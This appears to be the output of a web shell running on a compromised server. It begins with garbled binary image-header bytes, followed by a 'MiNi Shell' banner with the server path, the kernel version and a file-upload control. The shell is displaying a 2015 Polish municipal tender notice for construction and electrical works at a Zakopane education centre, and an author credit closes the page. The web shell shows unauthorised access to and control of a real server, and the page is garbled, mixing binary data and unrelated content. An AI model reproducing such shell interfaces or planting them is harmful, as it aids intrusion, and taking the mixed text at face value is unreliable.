JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150505/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150505/63439-N-2015.html

<p class="kh_header"><b>Zakopane: BZP.271.24.2015 wykonanie dodatkowych robót budowlanych niezbędnych do  zadania inwestycyjnego o nazwie  Dostosowanie obiektów Zakopiańskiego Centrum Edukacji na potrzeby żłobka, przedszkola i szkoły podstawowej.</b><br>
<b>Numer ogłoszenia: 63439 - 2015; data zamieszczenia: 05.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BZP.271.24.2015 wykonanie dodatkowych robót budowlanych niezbędnych do  zadania inwestycyjnego o nazwie  Dostosowanie obiektów Zakopiańskiego Centrum Edukacji na potrzeby żłobka, przedszkola i szkoły podstawowej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.Przedmiotem  zamówienia jest  wykonanie  dodatkowych robót budowlanych   koniecznych dla zadania inwestycyjnego  nr 163/2011 o nazwie Dostosowanie obiektów Zakopiańskiego Centrum Edukacji na potrzeby żłobka, przedszkola i szkoły podstawowej.
3.1.Prace  maja polegać na :
3.1.1.robotach rozbiórkowych
3.1.2.robotach ziemnych
3.1.3.robotach drogowych
3.1.4.urządzaniu zieleni
3.1.5.instalacji i montażu oświetlenia zewnętrznego typu parkowego
3.1.6.instalacji i montażu dodatkowych punktów świetlnych w oddziałach przedszkola
3.1.7.instalacji i montażu  punktów głośnikowych w oddziałach 1 i 2 przedszkola
3.1.8.instalacji do rzutnika i tablicy multimedialnej do oddziałów 1 i 2 przedszkola
3.1.9.adaptacji instalacji e.n.n.,TV i internetowej do projektu wnętrz przedszkola
3.2.Zakres zamówienia obejmuje w szczególności:
3.2.1.Wykonanie wszelkich niezbędnych rozbiórek wraz z demontażem i zabezpieczeniem urządzeń,
3.2.2.Wykonanie wszelkich prac przygotowawczych niezbędnych do realizacji zamówienia,
3.2.3.Wykonanie : 
3.2.3.1.rozbiórki istniejących nawierzchni utwardzonych
3.2.3.2.wykonanie korytowania
3.2.3.3.wykonanie wykopów liniowych pod instalację oświetleniową zewnętrzną
3.2.3.4.przekładki kabla energetycznego
3.2.3.5.budowy chodników o nawierzchni z kostki brukowej
3.2.3.6.budowy placów o nawierzchni z kostki brukowej
3.2.3.7.budowy miejsc postojowych o nawierzchni z kostki brukowej
3.2.3.8.ukształtowania terenu
3.2.3.9.zakupu, dostawie i nasadzeniu zieleni niskiej i wysokiej
3.2.3.10.wykonanie fundamentu pod ławki parkowe
3.2.3.11.zakupu, dostawie i montażu ławek parkowych
3.2.3.12.zakupie, dostawie i montażu  słupów oświetleniowych wraz z oprawami i fundamentem.
3.2.3.13.zakupie dostawie i montażu  oraz wykonaniu instalacji dodatkowych punktów świetlnych wraz z oprawami 
3.2.3.14.zakupie, dostawie i montażu oraz wykonaniu punktów głośnikowych wraz z głośnikami ,
3.2.3.15.wykonaniu instalacji dla rzutnika wraz z  zakupem dostawa i montażem ekranu i tablicy multimedialnej,
3.2.3.16.adaptacja  wykonanej instalacji e.n.n.TV i internetowej  do projektu aranżacji wnętrz w tym usunięcie kolizji gniazd sieciowych z projektowanym wyposażeniem.
3.2.3.17. Ustanowienie kierowników robot budowlanych  i instalacyjnych ,którzy będą podlegać kierownikowi budowy prowadzącemu roboty podstawowe i uzupełniające zatrudnionemu przez PBU PIOTROWSKI
3.2.3.18.Przygotowanie dokumentacji powykonawczej i skoordynowanie jej z dokumentacją robót realizowanych przez PBU PIOTROWSKI na obiekcie.

Uwaga: w obiekcie realizowane są roboty budowlane podstawowe i uzupełniające związane z wykonywaniem adaptacji obiektu na przedszkole przez firmę: PBU PIOTROWSKI 34-400 Nowy Targ, ul. Szaflarska 93 wyłonioną w drodze przetargu nieograniczonego. Do obowiązku Wykonawcy należeć będzie skoordynowanie prowadzenia robót z tą firmą

3.3.Przedmiot zamówienia podany w p. 3   szczegółowo  opisują:

3.3.1.Projekt Budowlany zmian (PBZ)
3.3.2.Projekt wykonawczy zmian (PWZ)
3.3.3.Specyfikacje Techniczne Wykonania i Odbioru Robót (STWIOR)

zawarte w  załączniku  nr 1 do niniejszej siwz. 

3.4.Przedmiotem zamówienia jest również taki element składowy nieujęty w dokumentacji projektowej  bez wykonania, którego odbiór i eksploatacja przedmiotu zamówienia nie jest możliwa z przyczyn prawnych i technicznych.

3.5.Zamawiający dopuszcza możliwość wystąpienia w trakcie realizacji przedmiotu umowy konieczności wykonania robót zamiennych w stosunku do przewidzianych w dokumentacji  w sytuacji, gdy wykonanie tych robot będzie niezbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru przepisami wykonania przedmiotu umowy. Roboty zamienne nie powodują zwiększenia wynagrodzenia Wykonawcy.


3.6.Zamawiający dopuszcza możliwość ograniczenia  wykonania pewnych robót przewidzianych w dokumentacji  gdy ich wykonanie będzie zbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami wykonania przedmiotu umowy. Roboty te nazwane są zaniechanymi a sposób potrącenia ich wartości z wynagrodzenia Wykonawcy określa wzór umowy.

3.7.Do Wykonawcy z którym zostanie podpisana umowa należeć będzie sporządzenie harmonogramu wykonywania robót, skoordynowanie go z harmonogramem robót prowadzonych na obiekcie i przedłożenie go do akceptacji Zamawiającego przed przystąpieniem do ich realizacji,
3.8.Wykonawca powinien zorganizować i prowadzić roboty sposób umożliwiający bezpieczne funkcjonowanie pozostałych nieobjętych ingerencją części budynku. 
3.9.Przed akceptacja Zamawiającego Wykonawca uzgodni harmonogram z  Zarządcą Zakopiańskiego Centrum Edukacji.
3.10.Zamawiający dopuszcza w trakcie wykonywania zadania zmianę harmonogramu. Zmiana harmonogramu wymaga każdorazowo akceptacji Zamawiającego.

3.11.Zamawiający wymaga aby wykonawca udzielił  co najmniej 36 miesięcznej gwarancji na wykonane roboty budowlane i zamontowane elementy wyposażenia objęte przedmiotowym zamówieniem.

3.12.Zamawiający dopuszcza do zastosowania w stosunku do wymienionych  w opisie przedmiotu zamówienia, materiały lub urządzenia równoważne o parametrach jakościowych cechach użytkowych, co najmniej na poziomie parametrów wskazanego materiału lub urządzenia, uznając tym samym każdy materiał lub urządzenie o wskazanych parametrach lub lepszych. W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów, uwiarygodniających te materiały lub rządzenia. Zamawiający podejmie decyzje o akceptacji równoważników  lub odrzucenia oferty po zasięgnięciu opinii autora dokumentacji projektowej oceniającej dokumenty uwiarygodniające stosowanie równoważników.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.26.27.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca jest zobowiązany wnieść wadium przetargowe w wysokości  5 000,00 zł (słownie:  pięć   tysięcy  złotych).
Wadium może być wnoszone w jednej lub w kilku  następujących formach: 
-pieniądzu;
-poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
-gwarancjach bankowych;
-gwarancjach ubezpieczeniowych;
-poręczeniach udzielanych przez podmioty, o których mowa w art. 6 lit. b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42 poz. 275 z późn. zm.) 
Wadium przetargowe w  pieniądzu należy wnieść  przelewem na konto 
Urzędu Miasta Zakopane w PEKAO S.A. w Zakopanem 
nr: 85 1240 4748 1111 0000 4871 8666
Wadium ma  znajdować się na koncie Zamawiającego najpóźniej w terminie składania ofert tj. 20 maja  2015 r. do godz.  12°°
Wadium wnoszone w pozostałych formach należy złożyć w postaci oryginału, najpóźniej w terminie składania ofert tj. 20 maja  2015 r.  do godz. 12°° w  Biurze ds. zamówień publicznych pok. nr 8 lub 7 (parter).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Warunek zostanie uznany za spełniony jeżeli Wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.
Ocena spełnienia powyższego warunku będzie dokonywana 
w oparciu o wymagane dokumenty i oświadczenia dołączone 
do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli  Wykonawca wykaże, że w ciągu ostatnich 5 lat przed upływem terminu składania oferta jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał  roboty o zakresie odpowiadającym swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia tj.  co najmniej  2 roboty  obejmująca swoim zakresem przebudowę  lub budowę elementów o nawierzchni brukowej dróg lub placów i   co najmniej 2 roboty  elektryczne  instalacyjne,o łącznej wartości nie niższej niż 500 000,00 zł brutto -potwierdzone 
dowodami określającymi, że roboty te zostały wykonane w sposób należyty     oraz wskazującymi, że zostały wykonane zgodnie z zasadami sztuki  budowlanej i prawidłowo ukończone.
Ocena spełnienia powyższego warunku będzie dokonywana 
w oparciu o wymagane dokumenty i oświadczenia dołączone 
do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Warunek zostanie uznany za spełniony jeżeli Wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.
Ocena spełnienia powyższego warunku będzie dokonywana 
w oparciu o wymagane dokumenty i oświadczenia dołączone 
do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami zdolnymi do realizacji zamówienia, w tym 
 zapewni objecie funkcji kierownika robót przez osoby posiadające uprawnienia budowlane do kierowania robotami: 
- w specjalności konstrukcyjnej bez ograniczeń lub odpowiadającymi wydanymi na podstawie wcześniejszych przepisów należące do właściwej Izby Inżynierów Budownictwa.

- w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych, bez ograniczeń lub odpowiadającymi wydanymi na podstawie wcześniejszych przepisów należące do właściwej Izby Inżynierów Budownictwa,
Ocena spełnienia powyższego  warunku  będzie dokonywana
w oparciu o wymagane dokumenty i oświadczenia dołączone 
do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Warunek zostanie uznany za spełniony jeżeli Wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.
Ocena spełnienia powyższego warunku będzie dokonywana 
w oparciu o wymagane dokumenty i oświadczenia dołączone 
do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca obowiązany jest do oferty  załączyć  wyceniony przedmiar robót.

Cena oferty, pokazana w wycenionym przedmiarze robót, obejmuje wszystkie nakłady związane z wykonaniem robót wynikających wprost z dokumentacji  jak również te nieujęte w dokumentacji, a bez których nie można wykonać zamówienia z uwzględnieniem wymagań warunków technicznego wykonania i odbioru robót budowlanych, jak również ich wykonania zgodnie z normami i obowiązującymi przepisami.

Przedmiary załączone do oferty przez  Zamawiającego  są materiałem poglądowym niezwalniającym Wykonawcy z wykonania własnego stanowiącego podstawę sporządzenia oferty.
Wynagrodzenie łączne brutto wykazane w wycenionych przedmiarach nie może być wyższe niż złożone w  druku oferty.
Wycenione przedmiary robót służą za podstawę do obliczenia wynagrodzenia Wykonawcy należnego mu z tytułu wykonania części przedmiotu zamówienia w sytuacji odstąpienia od umowy, wynagrodzenia za ewentualne zabezpieczenie przerwanych robót lub wyliczenia wartości robót zaniechanych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres  gwarancji na wykonane roboty i zamontowane elementy wyposażenia objęte przedmiotowym zamówieniem - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku z art. 144 Ustawy Zamawiający informuje, że zmiana postanowień w zawartej umowie może nastąpić w następujących przypadkach:
-Zmiany osób reprezentujących firmę, kluczowych specjalistów (kierowników budowy, inspektorów nadzoru) przedstawionych w umowie na inne legitymujące się, co najmniej równoważonymi uprawnieniami, w przypadku ich śmierci, rezygnacji z pełnienia obowiązków, utraty uprawnień i.t.p.
-Zmian podwykonawcy, przy pomocy, którego Wykonawca realizuje przedmiot umowy.
-Rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy.
-Zmiany osoby  osób wskazanych w umowie, jako nadzorujących roboty.

Zmiany terminu wykonania umowy o czas opóźnienia, jeżeli takie opóźnienie wystąpi lub będzie miało wpływ na wykonanie przedmiotu umowy w przypadku:
-Zawieszenia robót przez Zamawiającego.
-Zmian w dokumentacji dokonanych na wniosek Zamawiającego.
-Opóźnienia przekazania frontu realizacji robót.
-Zmiany terminu dokonania odbioru robót przewidzianych w umowie.
-Siły wyższej.

Zmiany sposobu realizacji przedmiotu zamówienia w postaci:
-Konieczności realizacji zamówienia przy zastosowaniu innych rozwiązań technicznych technologicznych niż wskazane w specyfikacjach, w przypadku gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem zamówienia.
-Odmiennych od przyjętych w specyfikacjach warunków skutkujących niemożnością zrealizowania przedmiotu zamówienia przy dotychczasowych założeniach technologicznych.
-Konieczności zrealizowania zamówienia przy zastosowaniu innych rozwiązań technicznych ze względu na zmiany obowiązującego prawa.

Zmiany wysokości wynagrodzenia - na wskutek rezygnacji z wykonania części robót wraz z określeniem maksymalnej wielkości tych robót i określeniem kwoty należnej za tę część w granicach udokumentowanego interesu Zamawiającego.



Konieczności zrealizowania zamówienia przy zastosowaniu innych rozwiązań technicznych ze względu na zmiany obowiązującego prawa.

Zmiany dokonane w granicach przewidzianych w ustawie Prawo budowlane wynikające z:
-Wprowadzenia uzgodnionych rozwiązań zamiennych w stosunku 
do przewidzianych w projekcie, zgłoszonych przez kierownika budowy 
lub inspektora nadzoru inwestorskiego, gdy zmiany dokonane zostały podczas wykonywania robót i nie odstępują w sposób istotny od zatwierdzonego projektu lub warunków pozwolenia na budowę w ramach art. 36a ust. 5 lub dokonane zostały zgodnie z zapisami art. 36a ust. 6 ustawy z zastrzeżeniem art. 57 ust. 2 ustawy Prawo budowlane.
-Wad dokumentacji projektowej jeżeli takie ujawnią się podczas realizacji zadania, pomimo dołożenia wszelkiej staranności przez projektanta. 

Zmiany wysokości wynagrodzenia - na wskutek rezygnacji z wykonania części robót wraz z określeniem maksymalnej wielkości tych robót i określeniem kwoty należnej za tą cześć w granicach udokumentowanego interesu Zamawiającego.

W przypadku ustawowych zmian stawek podatku VAT w trakcie obowiązywania umowy Zamawiający dopuszcza zmianę ceny wyłącznie w przypadku ustawowej zmiany stawki podatku VAT, przy czym zmianie ulegnie wyłącznie cena je brutto, cena  netto pozostanie bez zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Zamówienia  publiczne postępowania poniżej  wartości  art.11.8<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Rozwoju Lokalnego i Współpracy Europejskiej
Urząd Miasta Zakopane
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2015 godzina 12:00, miejsce: Biuro ds zamówień publicznych pok. 8 ,7 
Urząd Miasta Zakopane
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com